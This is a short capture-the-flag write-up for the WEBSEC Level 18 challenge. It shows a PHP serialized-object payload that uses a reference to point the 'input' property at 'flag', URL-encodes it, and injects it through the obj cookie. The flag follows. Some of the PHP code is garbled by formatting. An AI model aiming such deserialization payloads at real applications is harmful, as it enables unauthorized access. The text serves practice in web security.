WEBSEC Level 18

Challenge description

Can you please give it back? Thanks.

Walk through

STEP 1: Payload to point the obj −  > inputtothereferenceofobj->flag which in turn points to $flag

input = &obj −  > flag; echoserialize(obj); OUTPUT: O:8:"stdClass":2:{s:4:"flag";N;s:5:"input";R:2;} STEP 2: URL Encode the output OUTPUT: O%3A8%3A%22stdClass%22%3A2%3A%7Bs%3A4%3A%22flag%22%3BN%3Bs%3A5%3A%22input%22%3BR%3A2%3B%7D STEP 3: Insert the output as the obj cookie value OUTPUT: Here is your flag: WEBSEC{You_have_impressive_refrences.We'llcall_you_back.}.

Flag

FLAG: WEBSEC{You_have_impressive_refrences._We'll_call_you_back.}

For further queries, please DM me on Twitter: https://twitter.com/gopika-subramanian.